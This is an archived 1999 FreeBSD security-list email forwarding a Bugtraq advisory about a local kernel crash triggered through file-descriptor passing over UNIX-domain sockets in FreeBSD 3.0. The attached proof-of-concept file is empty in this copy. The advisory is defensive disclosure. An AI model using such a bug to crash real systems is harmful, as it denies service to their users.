Date:      Thu, 06 May 1999 20:38:00 +0200
From:      sthaug@nethelp.no
To:        security@freebsd.org
Subject:   Forward: KKIS.05051999.003b
Message-ID:  <13867.926015880@verdi.nethelp.no>

----Next_Part(Thu_May__6_20:37:58_1999)--
Content-Type: Text/Plain; charset=us-ascii

Just saw this on Bugtraq. Unable to reproduce it on 3.1-STABLE from
14 April.

Steinar Haug, Nethelp consulting, sthaug@nethelp.no

----Next_Part(Thu_May__6_20:37:58_1999)--
Content-Type: Message/rfc822

Return-Path: <owner-bugtraq@NETSPACE.ORG>
Delivered-To: sthaug@NETHELP.NO
Received: (qmail 13276 invoked from network); 6 May 1999 17:49:49 +0000 (GMT)
Received: from segate.sunet.se (192.36.125.6)
  by verdi.nethelp.no with SMTP; 6 May 1999 17:49:49 +0000 (GMT)
Received: from segate.sunet.se (192.36.125.16) by SEGATE.SUNET.SE (LSMTP for OpenVMS v1.1a) with SMTP id <10.F91D42BE@SEGATE.SUNET.SE>; Thu, 6 May 1999 18:51:54 +0100
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8d) with
          spool id 573208 for BUGTRAQ@NETSPACE.ORG; Thu, 6 May 1999 17:44:01
          +0000
Approved-By: aleph1@UNDERGROUND.ORG
Received: from nova.kki.krakow.pl (nova.kki.krakow.pl [195.116.9.2]) by
          netspace.org (8.8.7/8.8.7) with ESMTP id FAA21128 for
          <bugtraq@netspace.org>; Wed, 5 May 1999 05:22:29 -0400
Received: from nova.kki.krakow.pl (nova.kki.krakow.pl [195.116.9.2]) by
          nova.kki.krakow.pl (8.8.7/Ver.2c) with ESMTP id LAA18201 for
          <bugtraq@netspace.org>; Wed, 5 May 1999 11:26:21 +0200
X-Sender: lluzar@nova.kki.krakow.pl
MIME-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="1958937097-2116286281-925896381=:17696"
Message-ID:  <Pine.LNX.4.10.9905051119380.17696-200000@nova.kki.krakow.pl>
Date:         Wed, 5 May 1999 11:26:21 +0200
Reply-To:     Lukasz Luzar <lluzar@SECURITY.KKI.PL>
Sender:       Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From:         Lukasz Luzar <lluzar@SECURITY.KKI.PL>
Subject:      KKIS.05051999.003b
To:           BUGTRAQ@NETSPACE.ORG

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

--1958937097-2116286281-925896381=:17696
Content-Type: TEXT/PLAIN; charset=US-ASCII

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                          ###  ###  ###  ###  ###
                          ### ###   ### ###   ###
                          ######    ######    ###
                          ### ###   ### ###   ###
                          ###  ###  ###  ###  ###

                              S E C U R I T Y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 KKI Security Team                              Cracow Commercial Internet
 http://www.security.kki.pl                     http://www.kki.pl
 mailto:security@security.kki.pl                mailto:biuro@kki.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Report title        : Security problem with sockets in FreeBSD's
                       implementation of UNIX-domain protocol family.
 Problem found by    : Lukasz Luzar (lluzar@security.kki.pl)
 Report created by   : Robert Pajak (shadow@security.kki.pl)
                       Lukasz Luzar (lluzar@security.kki.pl)
 Report published   : 5th May 1999
 Report code        : KKIS.05051999.003.b
 Systems affected    : FreeBSD-3.0 and maybe 3.1,
 Archive             : http://www.security.kki.pl/advisories/
 Risk level          : high

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  As you know, "The UNIX-domain protocol family is a collection of protocols
 that provides local interprocess communication through the normal socket
 mechanism. It supports the SOCK_STREAM and SOCK_DGRAM socket types and uses
 filesystem pathnames for addressing."
 SOCK_STREAM sockets also support passing UNIX file descriptors between
 processes through the functions sendmsg() and recvmsg().
  While testing UNIX-domain protocols, we found a probable bug in
 FreeBSD's implementation of this mechanism.
  When we ran the attached example on FreeBSD-3.0 as a local user, the system
 crashed immediately with the error "Supervisor read, page not present"
 in kernel mode.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 See the attached example.

~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Copyright (c) 1999 KKI Security Team, Poland
 All rights reserved.

 Please address all questions to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


--1958937097-2116286281-925896381=:17696
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="example.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.9905051126210.17696@nova.kki.krakow.pl>
Content-Description:
Content-Disposition: attachment; filename="example.c"
--1958937097-2116286281-925896381=:17696--

----Next_Part(Thu_May__6_20:37:58_1999)----


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?13867.926015880>